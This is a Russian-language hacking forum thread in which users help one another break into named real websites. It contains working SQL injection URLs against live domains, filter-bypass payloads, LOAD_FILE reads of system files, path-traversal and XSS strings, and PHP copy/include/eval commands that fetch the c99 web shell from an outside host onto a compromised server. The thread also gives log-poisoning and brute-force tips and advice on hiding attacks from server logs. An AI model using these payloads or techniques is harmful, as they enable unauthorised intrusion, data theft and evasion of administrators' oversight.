тибе ничего не даст, ибо шелл должен быть в .txt формате, а то он будет воспроизводится на том сервере и перенаправлен на этот!

что-то нехватает фантазии раскрутить:

http://www.datehunters.com/Personals/member_page.asp?AdsID=17125+and+1=1&SexID=4

У меня то как раз все нормально!!!
и команда copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php");
тибе ничего не даст, ибо шелл должен быть в .txt формате, а то он будет воспроизводится на том сервере и перенаправлен на этот!
: )))) да я смотрю ты реальный знаток : ))))
а еще я умею gif тоже исполнять и умею php делать текстом : ))))
зайти по ссылке дабы больше не лохаться так ;)

: )))) да я смотрю ты реальный знаток : ))))
а еще я умею gif тоже исполнять и умею php делать текстом : ))))
зайти по ссылке дабы больше не лохаться так ;)

Ну... я же по чужим ссылкам не хожу. И не знаю что там!!
Так что не надо выЁ!!

ты ищи возможности, а не недостатки - и тогда успех станет случаться намного чаще чем облом ;)

CTAPu4OK
попробуй так

команда 1.
copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php");

команда 2.
include("/tmp/qwe.php");

Тоже не как =( выполняется без ошибок, но файла на сервере нет.

Через выполнение пхп и линукс команд я уже все что знал испробовал, переименовывал, перемещал, пытался записывать в уже имеющиеся файлы данные.

У меня уже был такой случай, вот точно такой же, так же фильтровались кавычки, и из за них я нечего не мог сделать, сам не справился, попросил знакомого что бы помог, он с легкостью залил шелл через sql inj, а как не говорит =(

CTAPu4OK
eval($_GET[cmd]); пробовал?

CTAPu4OK
eval($_GET[cmd]); пробовал?

Скрипт не пашет
Но это получится вот так
eval($_GET[cmd]);
exit;

т.е. если бы он и заработал, я все равно бы нечего не смог сделать) после каждого выполнения скрипта exit; закрывает работу со скриптом, а без exit; експлойт не пашет =(((

Я уже 2 дня над этим парюсь(

CTAPu4OK
Надеюсь ты сам понимаешь что хочешь?

Объясни по русски, что у тебя там имеется в наличии

1 Если есть исполнение кода и папки на запись, то почему ты не можешь залить шелл?
2 Если есть рутовый доступ в ПМА то о каких кавычках ты говоришь?

phpinfo() покажи тут. А именно диррективы
allow_url_fopen
allow_url_include
disable_functions
magic_quotes_gpc
open_basedir
safe_mode

И напиши что конкретно у тебя имеется. А то по твоим словам я не понимаю у тебя ПМА на том-же сервере, или на другом вообще.

что-то нехватает фантазии раскрутить: http://www.datehunters.com/Personals/member_page.asp?AdsID=17125+and+1=1&SexID=4

там у вас Microsoft JET Database. следовательно запросы передаются на низком уровне.

там у вас Microsoft JET Database. следовательно запросы передаются на низком уровне.

https://forum.antichat.ru/showpost.php?p=2149589&postcount=13265
https://forum.antichat.ru/showpost.php?p=2152999&postcount=13287

Ты уж ответь на вопрос, будь так добр

все вы про "вопросы на низком уровне" :(

что это такое? :rolleyes:

во интересно,все любят говорит,а когда задаешь вопрос никого нету :D :confused:

все вы про "вопросы на низком уровне" :(

что это такое? :rolleyes:
при ошибке "Microsoft VBScript runtime error '800a000d'" - фиг извлечёшь данные, это говоря об этом (https://forum.antichat.ru/showpost.php?p=2148889&postcount=13258) (типа "низкоуровневые запросы")

а в данном случае извлечь возможно

Вы его адвокат, молодой человек?
Причём тут это?
Или это означает по вашему, что в Accessе невозможна инъекция?
я адвокат только сам себе
немного не так выразился
в аксессе возможны инъекции

он имел в виду, что запросы передаются на уровне VB скриптов, при такой ошибке фиг извлечёшь данные
Вы его адвокат, молодой человек?
Причём тут это?
Или это означает по вашему, что в Accessе невозможна инъекция?

уважаемый Jokester почитайте это:
https://forum.antichat.ru/threadnav30501-1-10.html
5 пост

CTAPu4OK
Надеюсь ты сам понимаешь что хочешь?

Объясни по русски, что у тебя там имеется в наличии

1 Если есть исполнение кода и папки на запись, то почему ты не можешь залить шелл?
2 Если есть рутовый доступ в ПМА то о каких кавычках ты говоришь?

phpinfo() покажи тут. А именно диррективы
allow_url_fopen
allow_url_include
disable_functions
magic_quotes_gpc
open_basedir
safe_mode

И напиши что конкретно у тебя имеется. А то по твоим словам я не понимаю у тебя ПМА на том-же сервере, или на другом вообще.

ПМА на сервере с сайтом (сервер 1)
Эксплойт на другом сервере (сервер 2)
TXT файл с командами для эксплойта (сервер 3)
т.е. вот конф файл эксплойта
$pma_setup_url = 'blablabla'; /*полный адрес скрипта установки phpMyAdmin (Сервер 1)*/
$ftp_code = 'blablabla'; /*полный ftp-путь до файла с содержимым <? phpinfo();exit; ?> (Сервер 3)*/



Что у меня есть: :)
Эксплойт пма через Setup.php, возможность использовать стандартные команды на сервере ограниченного пользователя (просмотр всего содержимого, инфу сервера), использование коротких пхп скриптов.
SQL Inj, Могу просматривать таблицы, колонки (минус в том что могу просматривать только с помощью limit или group_concat, пользователей очень много и найти среди них админа (Хоть и знаю логин) этими методами займут очень много времени (если ошибаюсь поправьте меня) и не факт что в админке будет аплоад), так же могу просматривать файлы с помощью LOAD_FILE
Папки 777


Чего не могу:
експлойт пма: Не могу выполнять команды "перемещения, записи, редактирования, удаления, переименовывания, инклюды, архивация, дампы и тд."
SQL INJ: залить файл на сервер (из за ковычек), прочитать конфигурационные файлы "config.php"
Не могу выйти за пределы папки www с помощью експлойта пма, а с помощью SQL INJ могу
Не могу увидеть на экране ошибки которые выдает mysql, а где он хранит логи я не знаю =(

1. Исполнение есть, но ограниченное, не знаю как объяснить на научном но некоторые команды пашут а некоторые нет, и после каждой команды идет закрытие работы с сервером.

2. Рутового доступа в пма у меня нету, у меня есть доступ под юзверем apache который состоит в ограниченной группе apache. и рутовый доступ SQL INJ.

allow_url_fopen On
allow_url_include Нету такого
disable_functions no value
magic_quotes_gpc On
open_basedir .
safe_mode Off

-587955+union+select+1,2,3,4,0x6869,6,7,8,9,10,11+i nto+outfile+'/home/data/www/'+from+mysql.user--

Вроде бы все написал и не где не ошибся)

уважаемый Jokester почитайте это:
https://forum.antichat.ru/threadnav30501-1-10.html
5 пост

Я так понимаю, ты утверждаешь, что там нет инъекции?
Или в этих базах вообще невозможна инъекция?
Или что ты хотел этим сказать?

И при чём тут "низкий уровень"? Ты просто прочитал это там, и теперь не разобравшись о чём речь везде это пишешь, или у тебя есть свой взгляд на это, и ты способен своими словами, без линков описать мне, ЧТО ТЫ ХОТЕЛ ЭТИМ СКАЗАТЬ?

Я так понимаю, ты утверждаешь, что там нет инъекции? Или в этих базах вообще невозможна инъекция? Или что ты хотел этим сказать? И при чём тут "низкий уровень"? Ты просто прочитал это там, и теперь не разобравшись о чём речь везде это пишешь, или у тебя есть свой взгляд на это, и ты способен своими словами, без линков описать мне, ЧТО ТЫ ХОТЕЛ ЭТИМ СКАЗАТЬ?

1. Да нет инъекции
2. -//-//-//-//-
3. -//-//-//-//-
4. ?
5. Да я просто прочитал это и везде пишу, у меня нету никаких взглядов на это.

p.s. видимо я ошибался=( т.к.
https://forum.antichat.net/showpost.php?p=474995&postcount=1

Чего не могу:
експлойт пма: Не могу выполнять команды "перемещения, записи, редактирования, удаления, переименовывания, инклюды, архивация, дампы и тд."
..........
1. Исполнение есть, но ограниченное, не знаю как объяснить на научном но некоторые команды пашут а некоторые нет, и после каждой команды идет закрытие работы с сервером.

Не думаю что такое возможно. Не знаю что там у тебя за сплоит, но если он выполняет код, и есть папка на запись, то и шелл он зальёт. Просто ты что-то не так делаешь.

Кавычки тут роль особую не играют, тебе уже сказали что нужно сделать:
ev=eval(base64_decode(copy("http://madnet.name/files/download/9_c99madshell.php","/папка/на/запись.шелл.php");));

Только разумеется вот это
"http://madnet.name/files/download/9_c99madshell.php","/папка/на/запись.шелл.php");
кодируешь в бейс

При твоих настройках должно работать без проблем.
Хотя, я ХЗ что там у тебя за чудосплоит :)

========================

pinch
ОК, ты пожалуйста будь повнимательнее, и прежде чем советовать что-то посмотри и проверь сам. Скуль там есть, разумеется, просто фильтрация union и select.
Ну и уж конечно, в этих базах, как и во всех других без проблем проводятся скули, просто как и везде своя специфика

ok=)...

коqда заливаем шелл c sql только из mysql.user мойно заливать?
а например если нето mysql.user-a мойно заливать шелл из напримерь с admin или users table-oм ?

коqда заливаем шелл c sql только из mysql.user мойно заливать?
а например если нето mysql.user-a мойно заливать шелл из напримерь с admin или users table-oм ?

Из mysql.user можно узнать хватает ли прав, именно это подразумевается по идее, а собственно код шелла можно писать откуда угодно.

Не думаю что такое возможно. Не знаю что там у тебя за сплоит, но если он выполняет код, и есть папка на запись, то и шелл он зальёт. Просто ты что-то не так делаешь.

Кавычки тут роль особую не играют, тебе уже сказали что нужно сделать:
ev=eval(base64_decode(copy("http://madnet.name/files/download/9_c99madshell.php","/папка/на/запись.шелл.php");));

Только разумеется вот это
"http://madnet.name/files/download/9_c99madshell.php","/папка/на/запись.шелл.php");
кодируешь в бейс

При твоих настройках должно работать без проблем.
Хотя, я ХЗ что там у тебя за чудосплоит :)

========================

pinch
ОК, ты пожалуйста будь повнимательнее, и прежде чем советовать что-то посмотри и проверь сам. Скуль там есть, разумеется, просто фильтрация union и select.
Ну и уж конечно, в этих базах, как и во всех других без проблем проводятся скули, просто как и везде своя специфика

Вот тут самое интересное, base64 не работает не у меня на компе не на сервере. нечего не выдает и нечего не сохраняет)

Если чисто copy, на моем компе сохраняет шелл, на сервере выполняется нормально но файл не появляется)

И вот еще вопрос, зависит ли это на заливку:

по умолчанию я нахожусь (выполняю команды из/от) по адресу /home/data/www/myadmin/scripts/ но сохраняю через скрипт в каталог /home/data/www/images/tep но пользователем apache я не могу выйти за пределы www

Так вот может надо писать так:
../home/data/www/images/tep
или так
/www/images/tep
или так
../../../home/data/www/images/tep
или даже так
../../../images/tep / ?

пы.сы. права на папки все проставлены 100%

Все, всем пасиб =)
../../../../../home/data/www/images/tep
Вот так вот пошло))

Подскажите плиз брут для mysql на удаленном хосте на 3306 порту (если есть такое)!

Подскажите плиз брут для mysql на удаленном хосте на 3306 порту (если есть такое)!
THC Hydra (http://freeworld.thc.org/thc-hydra/) и для lin и для win ;)

еще Medusa (http://pentestit.com/tag/medusa/)
но она только для лин. зато, судя по отзывам, круче и развивается в отличии от гидры

DrakonHaSh а троян там там и должен быть?

GOGA075, антивирь скорее всего определяет проги как hack tool

Гога, не параной :) а когда параноишь используй гугл ;)

новый Metasploit Framework 3.4.0 ( http://www.metasploit.com/framework/download/) тоже теперь сие может:
This release includes support for brute forcing accounts over SSH, Telnet, MySQL, Postgres, SMB, DB2, and more,

http://www.gasparyanjivan.com/gallery.php?pic=-69+union+select+0,1,2,3,4

pomoqite raskrutit

GOGA075, антивирь скорее всего определяет проги как hack tool
Ты не прав, так троян какой то!!

DrakonHaSh благодарю за помощ и за Metasploit Framework 3.4.0
Буду пробовать!!!

Подскадите ещо прогу для создания дампа через sql inj

SQL Injection Tool пробывал?

так же вроде можно с помощью sqlmap или как там ёё

SQL Injection Tool пробывал?

так же вроде можно с помощью sqlmap или как там ёё

Да там максимум можео 999 строк вывести, а если ставить 99999 то с ошибкой вылетает
А надо пару лямов примерно!!!

Ошибка запроса SQLSTATE[HY000]: General error: 20018 Unclosed quotation mark before the character string '\''. [20018] (severity 5) [(null)]

Скуля или нет?

Ошибка запроса SQLSTATE[HY000]: General error: 20018 Unclosed quotation mark before the character string '\''. [20018] (severity 5) [(null)]

Скуля или нет?
нет. он как раз отлавливает ошибку. но возможно ест xss. попробуй ='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

http://www.b2match.com/smagua/index.php?file=list.php

http://www.b2match.com/smagua/index.php?file=../../../etc/passwd%00.php

Здесь есть инклуд?

http://www.b2match.com/smagua/index.php?file=./js/jquery-ui-1.7.2.custom.min.js%00.php
http://www.b2match.com/smagua/index.php?file=../info/features.htm
http://www.b2match.com/smagua/index.php?file=../info/index.php

Ты сам как думаешь, что это?

есть шелл зделал connect на mysql базу..
отсюда как зделать мета на саыте ?

Имеется скуля на сайте, но всякие union, select, substring бьются на два слова (в середину вставляется пробел) и скуля соответственно не крутится. Регистр менял.
Как крутить?

P.S. Бьется юнион и селект в том случае, если в строке идет сначала union, а потом select
select+union - не бьет
uniondasdsadsadselect не бьет
uinon dadasdsadsadasda select бьет
union/*dasdasdasdsadsd*/select бьет

substring( бьет
substring *без скобки* не бьет

Имеется скуля на сайте, но всякие union, select, substring бьются на два слова (в середину вставляется пробел) и скуля соответственно не крутится. Регистр менял.
Как крутить?

P.S. Бьется юнион и селект в том случае, если в строке идет сначала union, а потом select
select+union - не бьет
uniondasdsadsadselect не бьет
uinon dadasdsadsadasda select бьет
union/*dasdasdasdsadsd*/select бьет

substring( бьет
substring *без скобки* не бьет
ну попробовать применить http parameter pollution для обхода фильтра
вместо substring() заюзать mid(), хз чё ещё =\
з.ы. с mid'ом реально работает кстати:
...+and+mid(@@version,1,1)=5--+

Подниму свой вопрос ещо раз.
Ну жен брут для MySQL серверов на удаленном порту (3306). Не через phpmyadmin!!

http://previous.colop.com/sl/products/colop--printer_dater/product.php?id=-colop:11322000'+union+select+1,2,3,4,5,6,7,8,9,10, 11,12+--+


Здесь есть SQL-inj?

http://previous.colop.com/sl/products/colop--printer_dater/product.php?id=-colop:11322000'+union+select+1,2,3,4,5,6,7,8,9,10, 11,12+--+


Здесь есть SQL-inj?слепая есть =>
http://previous.colop.com/sl/products/colop--printer_oval/product.php?id=colop:13026000'+and+(select substring(version(),1,1))=4/*
если пытаться вывести и первый запрос возращ. фелсе, то ошибка в XML. мб Xpath и SQLinj хз

методом научного тыка:
http://www.stockhouse.com/adredirect.asp?sid=select true
http://www.stockhouse.com/adredirect.asp?sid=+select true
http://www.stockhouse.com/adredirect.asp?sid=select+ false
=> 'select%'
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)
спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего?

http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)--
выводит таблицу с текушего бд Shdb

спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего?

http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)--
выводит таблицу с текушего бд Shdb

+where+table_schema=

+where+table_schema=
если бы where помогло не писал бы тут((

вот
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables+wh ere+table_schema='SH_users')--

ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/adredirect.asp, line 25

спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего?

http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)--
выводит таблицу с текушего бд Shdb
group_concat(table_name)+from+infor mation_schema.tables+where+table_schema!='informat ion_schema'
group_concat(table_name)+from+infor mation_schema.tables+where+table_schema!='informat ion_schema'+and+table_name>'здесь имя последней таблицы, которая вывелась в первом запросе'
Либо group_concat(table_name)+from+infor mation_schema.tables+limit+0,1 и поочередно меняешь limit 0,1 limit 1,1 limit 2,1 и тд.

group_concat(table_name)+from+infor mation_schema.tables+where+table_schema!='informat ion_schema'
group_concat(table_name)+from+infor mation_schema.tables+where+table_schema!='informat ion_schema'+and+table_name>'сдесь имя последней таблицы, которая вывелась в первом запросе'
Либо group_concat(table_name)+from+infor mation_schema.tables+limit+0,1 и поочередно меняешь limit 0,1 limit 1,1 limit 2,1 и тд.
хмм. вроде ругается
Microsoft OLE DB Provider for SQL Server error '80040e14' 'group_concat' is not a recognized built-in function name.
/adredirect.asp, line 23
я уже знаю имена всех бд, но нужные бд не текуший :confused:

+where+table_schema+not+in+('information_schema')


а так?

Microsoft OLE DB Provider for SQL Server error '80040e14' 'group_concat' is not a recognized built-in function name.
/adredirect.asp, line 23

А, ну так это MSSQL, ясное дело будет ругаться на group_concat :)

+where+table_schema+not+in+('information_schema')


а так?
спс, как я понял тут нельзя выводит инфо именно с определеной бд(SH_users)

спс, как я понял тут нельзя выводит инфо именно с определеной бд(SH_users)


ну не будь ленивым,иди дальше и будет твой бд ;)

спс, как я понял тут нельзя выводит инфо именно с определеной бд(SH_users)
упс , вернее так:
http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20 where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514 492E34962820230F0E51BEE26%27%29%29--

далее
http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20 where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514 492E34962820230F0E51BEE26%27,%27MSmerge_log_files% 27%29%29--

и т.д

В mssql есть база данных в которой хранится информация о всех таблицах и колонках во всех бд данного сервера

статьи читать надо.

упс , вернее так:
http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20 where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514 492E34962820230F0E51BEE26%27%29%29--

далее
http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20 where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514 492E34962820230F0E51BEE26%27,%27MSmerge_log_files% 27%29%29--

и т.д

В mssql есть база данных в которой хранится информация о всех таблицах и колонках во всех бд данного сервера

статьи читать надо.
ну статьи то читаю просто этот фильтр меня немного перепутал

ну статьи то читаю просто этот фильтр меня немного перепутал
тут какая то неполадка. Я регал мейл kvadimex но не могу найти в базе этот мейл((. Подскажите как делать запрос тут. like '%email%' прошло в поиске таблицы с мейлом но like '%kvadimex%' не работает

Можно что-то придумать для такого запроса? :rolleyes: $table никак не фильтруется.

$sql = "REPAIR TABLE {$table}";

не могу никак заинклудить (мож его тут и нет...хз)
пробовал и с нулевым байтом и с ? и с расширением и без него...хз в чем дело
http://forum.hse.ru/gold/index.php?t=usrinfo&id=http://site.ru/99.php%00

если тут нет инклуда, то мб что то другое?

не могу никак заинклудить (мож его тут и нет...хз)
пробовал и с нулевым байтом и с ? и с расширением и без него...хз в чем дело
http://forum.hse.ru/gold/index.php?t=usrinfo&id=http://site.ru/99.php%00

если тут нет инклуда, то мб что то другое?

инклуд в параметре id? nea :)

http://forum.hse.ru/gold/index.php?t=usrinfo&id=1

и? Еще не надоело писать то, что и без вашего участия уже с такой же ошибкой (читай - кривые руки админа)?

PS: Для начала найдите сайт, которые сразу, без вас, не вываливает мильон ошибок по какой-то ссылке

Konqi,Pashkela

то что и без меня есть ошибки я заметил=)
мне интересно могу ли я влиять на бд каким либо образом?

Konqi,Pashkela

то что и без меня есть ошибки я заметил=)
мне интересно могу ли я влиять на бд каким либо образом?

тебе нужно бд или инклуд?

инклуд никак не связано с базой

то что и без меня есть ошибки я заметил=)

а теперь подумай

Как выести ВСЕ базы данных, кроме текущей?
Работаю с 5 веткой)

Как выести ВСЕ базы данных, кроме текущей?
Работаю с 5 веткой)

select+group_concat(table_schema)+from+information _schema.tables

Konqi:
или
select+group_concat(schema_name)+from+information_ schema.schemata

Konqi:
или
select+group_concat(schema_name)+from+information_ schema.schemata


спасибо

select+database()+limit+...

Хотел бы узнать любую инфу по чтению файлов через sql-inj. кто может просвятить?

Хотел бы узнать любую инфу по чтению файлов через sql-inj. кто может просвятить?

через LOAD_FILE

через LOAD_FILE
Развернутый ответ. я знаю про эту комманду, но что то в самый ответсвенный момент она не заработала. про фаил прив я тоже знаю. интересует в каком виде казывается путь до файла - site.ru/config.php так?

Развернутый ответ. я знаю про эту комманду, но что то в самый ответсвенный момент она не заработала. про фаил прив я тоже знаю. интересует в каком виде казывается путь до файла - site.ru/config.php так?

При load_file надо указывать полный путь к файлу, нет, не с доменом, а путь на самом серваке... Т.е. тебе надо раскрыть пути, если есть вывод ошибок, то пути сами вылезут, если же нет, то можно найти в /etc/passwd (сначала попробуй его прочитать, если не знаешь, как определить есть ли file_priv). И не забывай про МК, надо пути кодировать. Еще вариант найти полный путь до сервака проиндклюдить httpd.conf

Хотел бы узнать любую инфу по чтению файлов через sql-inj. кто может просвятить?

В этой статье есть самое необходимое:
https://forum.antichat.ru/threadnav43966-1-10.html

ну и тут немного:
https://forum.antichat.ru/thread104591.html

есть несколько баз. (5 ветка)
есть офигеть, сколько полей и столбцов.
выбрал одно поле и вывел оттуда все названия столбцов.
А теперь как узнать какое поле к какой БД принадлежит. ?
Возможно это без тупого перебора?))

jecka3000 Без лимита нереально...

А теперь как узнать какое поле к какой БД принадлежит. ?
тут все поля к одной и той же БД

есть несколько баз. (5 ветка)
есть офигеть, сколько полей и столбцов.
выбрал одно поле и вывел оттуда все названия столбцов.
А теперь как узнать какое поле к какой БД принадлежит. ?
Возможно это без тупого перебора?))

Используй table_schema.

Взял для примера скуль с соседней темы и добавил туда табл схему:

http://www.ry7.ru/index.php?s=-58+union+select+group_concat(0x0b,TABLE_NAME,0x3a, table_schema)+from+information_schema.tables--

Теперь будет выводится и название БД, к которой эта таблица относится. Так же точно и с колонками.

не могу считывать файлы, подскажите
права вроде есть
root'@'localhost' | FILE | YES

USER() - возвращает что я под root@localhost
VERSION() - 5.0.51a-3ubuntu5.5

кавычки фильтруются по этому кодирую
к примеру
etc/passwd >>> 0x6574632f706173737764

делаю такую вот инъекцию
... where 1=2 union select LOAD_FILE(0x6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
но в результате приходит пустая строка.
файл пытаюсь открыть по пути который мне возвращается в ошибке, типа:
/usr/local/nginx/....../index.php

что я делаю не так?

не могу считывать файлы, подскажите
права вроде есть
root'@'localhost' | FILE | YES

USER() - возвращает что я под root@localhost
VERSION() - 5.0.51a-3ubuntu5.5

кавычки фильтруются по этому кодирую
к примеру
etc/passwd >>> 0x6574632f706173737764

делаю такую вот инъекцию
... where 1=2 union select LOAD_FILE(0x6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
но в результате приходит пустая строка.
файл пытаюсь открыть по пути который мне возвращается в ошибке, типа:
/usr/local/nginx/....../index.php

что я делаю не так?
Вообще то не всегда на /etc/passwd есть права ога?
ВО вторых читай index.php лучше, там доберёшься до конфигов.

1. /etc/passwd
2. ...where 1=2 union select LOAD_FILE(0x6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
выглядит странновато как-то
по
...where 1=2 union select 123123123,2,3,4,5,6,7,8 limit 0,100#
выводит 123123123 ?

Вообще то не всегда на /etc/passwd есть права ога?
ВО вторых читай index.php лучше, там доберёшься до конфигов.
ну мне /etc/passwd и не нужен, это я для примера привёл, т.к. путь короткий, хотя тоже ни чего не возвращает
мне нужен именно php файл
в результате ошибки возвращается такой текс
mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ] mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/usr/local/nginx/html/..путь до файла .php



1. /etc/passwd
2. ...where 1=2 union select LOAD_FILE(0x6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
выглядит странновато как-то
по
...where 1=2 union select 123123123,2,3,4,5,6,7,8 limit 0,100#
выводит 123123123 ?

да


и еще вопрос.. ошибки sql куда нибудь логируются? админ потом все тексты ошибочных sql увидит, или только сам факт ошибки

zuzzz:

1. надо указывать не etc/passwd, а /etc/passwd, следовательно твой запрос принимает следующий вид
where 1=2 union select LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#

вряд ли это тебе поможет, так как ты пробовал другие пути (/usr/local/nginx/....../index.php), но на будущее

2. у меня вопрос: зачем ты при запросе с LOAD_FILE используешь limit ..,..?

3. если тебе возвращается пустая строка, то либо у тебя нет прав на чтение, либо такой файл не существует. Попробуй системные файлы такие как: /etc/hosts, /etc/issue, а также другие скрипты твоего сайта, полный путь к которым ты знаешь.

4. насчет логирования sql ошибок не скажу, но если ты юзаешь GET-запросы, то в error.log и access.log будет все видно

Вообще то не всегда на /etc/passwd есть права ога?
в 95% случаев есть :(
Всегда есть на /etc/hosts, его лучше читать

mr.celt:

1) спасиб, запомню
2) лимит всегда ставлю, на всякий случай, чтобы по ошибке слишком много данных не получить
он тут не помеха

3) получилось вытащить файл /etc/hosts )
а этот /etc/issue не сумел....
значить права есть

4) запросы post. Это что то меняет?
и как долго данные в error.log и access.log хранятся?

zuzzz

Про POST-запросы. Может окажусь неточным, если что - поправьте. Если передавать запросы методом GET, то все отлично ложится в access.log данного сайта, включая всякие там UNION SELECT LOAD_FILES ... и т.д. При желании поиска методов взлома админ легким grep-ом найдет все запросы и поймет, где у него проблемы.
А если передавать данные методом POST, то все параметры ложаться в тело запроса и при "стандартной" настройке apache в логи не попадают или становятся менее заметными.

Про время хранения, это все индивидуально и зависит от настроек сервера. Я встречал сервера, где access.log и error.log заново начинались каждую неделю, а все остальные удалялись.

4) запросы post. Это что то меняет?
и как долго данные в error.log и access.log хранятся?
при post в log будет запись вида
...bla.php
а при get
...bla.php?id=123 where 1=2 union select LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
т.е. паливо, отлично видимое невооруженным взглядом :)

как хранятся error.log и access.log зависит наверное и от настроке конкретного сервера/сайта, но те, что мне попадались - почти всегда, насколько помню, хранятся "вечно" - просто старые переносятся в архив. вопрос в том как часто туда заглядывает админ. на многих сайтах, такое впечатление, что вообще никогда :)

В случае наличия на сервере mod_security то и пост запросы будут в логах

Кто подскажет что делать если стоит фильтрация UNION или SELECT??

+union+/*!select*/+0,1,2....
+UniOn+SeLecT+0,1,2....
+Union+Select+0,1,2....
+/*!union*/+/*!select*/+0,1,2....

В случае наличия на сервере mod_security то и пост запросы будут в логах
если стоит mod_security то "обыкновенные" конструкции sql inj
... union select ...
вроде как работать не будут ?

+union+/*!select*/+0,1,2....
+UniOn+SeLecT+0,1,2....
+Union+Select+0,1,2....
+/*!union*/+/*!select*/+0,1,2....

Какие еще есть способы?

...+uniunionon+seleselectct...
глупо так гадать, зависит от того, какой фильтр.

Кто подскажет что делать если стоит фильтрация UNION или SELECT??

Если фильтрация действует, когда union и select вместе, тогда используй подзапросы.

+UniOn+SeLecT+0,1,2....
+Union+Select+0,1,2....

Это одно и тоже.

union+%53%45%4C%45%43%54

еще мессаг~10 примерно, и мы таки придем к тому, что надо выложить сцыку и уже не страдать ерундой, мда. Придлагаю внести в правила

отличное правило)))

P.S. там ещё mod_rewrite может быть)

union+%53%45%4C%45%43%54
Нет слов.

Выкладывайте ссылку, а то гадать нету резона, да ещё и непонятно какая фильтрация, либо по типу preg_match, или по типу preg_replace.

что не так?

2 pinch

%53%45%4C%45%43%54=select ? :)

Здравствуйте уважаемые форумчане.
Есть небольшой вопросик.
Можно ли использовать лог напрямую, а не черeз ../../../proc/self/fd/{0-9} ?
Просто на одном сайте у меня кроме /etc/passwd ничего не открывалось, я начал искать лог напрямую, через конфиг апача /etc/httpd/config/httpd.conf нашел пути до файла логов, и вывел его напрямую. Нашел ошибку и попытался через юзерагент залить шел.
Потом просто перестал открываться лог. Возможно я по неопытности запорол. Возможно system() было запрещено. Или же вся проблемы что с этим логом не получиться залить впринципе?

2 pinch %53%45%4C%45%43%54=select ?

да

еще мессаг~10 примерно, и мы таки придем к тому, что надо выложить сцыку и уже не страдать ерундой, мда. Придлагаю внести в правила

http://www.worstpreviews.com/review.php?id=-1+UniOn+all+SelEct+1,2,3,4,5,6,7,8,9,10,11,12--

http://www.worstpreviews.com/review.php?id=-1+UniOn+all+SelEct+1,2,3,4,5,6,7,8,9,10,11,12--
там нет никакой фильтрации, два запроса, ты работаешь со вторым, кол-во колонок подобрано правильно (вторая ошибка исчезает (,13)). данные на страницу скорее всего попадают с двойных запросов; можешь конечно поэксперементировать с полями, но проще заюзать соседний скрипт:
http://worstpreviews.com/headline.php?id=-8848+union+select+1,2,3,4,5,6,7,8

можно и этот
http://www.worstpreviews.com/review.php?id=-1+UNION SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41--+

Здравствуйте уважаемые форумчане.
Есть небольшой вопросик.
Можно ли использовать лог напрямую, а не черeз ../../../proc/self/fd/{0-9} ?
Просто на одном сайте у меня кроме /etc/passwd ничего не открывалось, я начал искать лог напрямую, через конфиг апача /etc/httpd/config/httpd.conf нашел пути до файла логов, и вывел его напрямую. Нашел ошибку и попытался через юзерагент залить шел.
Потом просто перестал открываться лог. Возможно я по неопытности запорол. Возможно system() было запрещено. Или же вся проблемы что с этим логом не получиться залить впринципе?

Все файлы перестали открываться и /etc/passwd и /etc/httpd/config/httpd.conf?
Если сама дырка осталась, то вряд ли system() запретили.
Ссылку в студию?

Перестал открываться сам лог только, в который и было записано system(), я вот думаю system был отключен и это вызывало ошибку, а вывод самой ошибки был закрыт. Идея имеет право на жизнь, как думаете??? И работал кто-то с логами напрямую для шелов? Все остальное осталось как было. Причем это было на двух логах этой дыры. Дома на днях поищу ссыль.

trafbot
Чтобы не гадать насчет отключения system, поищи php.ini.

что не так?
Раскрою тебе небольшой секрет, если написать %3A, и : в браузере, разницы небудет, ога?

нужен скрипт для блайнд-скуль с использованием more1row.Подскажите таковой!)

Раскрою тебе небольшой секрет, если написать %3A, и : в браузере, разницы небудет, ога?

ну это понятное дело, вам кажется не хватает "практики" по sql инъекциям

нужен скрипт для блайнд-скуль с использованием more1row.Подскажите таковой!)
Toolza (https://forum.antichat.ru/threadnav148915-1-10.html) от Pashkela.
Поддерживает и floor(rand()) и NAME_CONST

Toolza (https://forum.antichat.ru/threadnav148915-1-10.html) от Pashkela.
Поддерживает и floor(rand()) и NAME_CONST
floor(rand()) и NAME_CONST поддерживают руки, для них скрипты не нужны.

Снейк просит скрипт для чистого блайнда more1row, разве в этом скрипте такое есть?

Я не увидел, хотя возможно не там искал, ведь я скептически отношусь к разработкам автора :) если и правда есть, покажи будь так добр

floor(rand()) и NAME_CONST поддерживают руки, для них скрипты не нужны.

Снейк просит скрипт для чистого блайнда more1row, разве в этом скрипте такое есть?

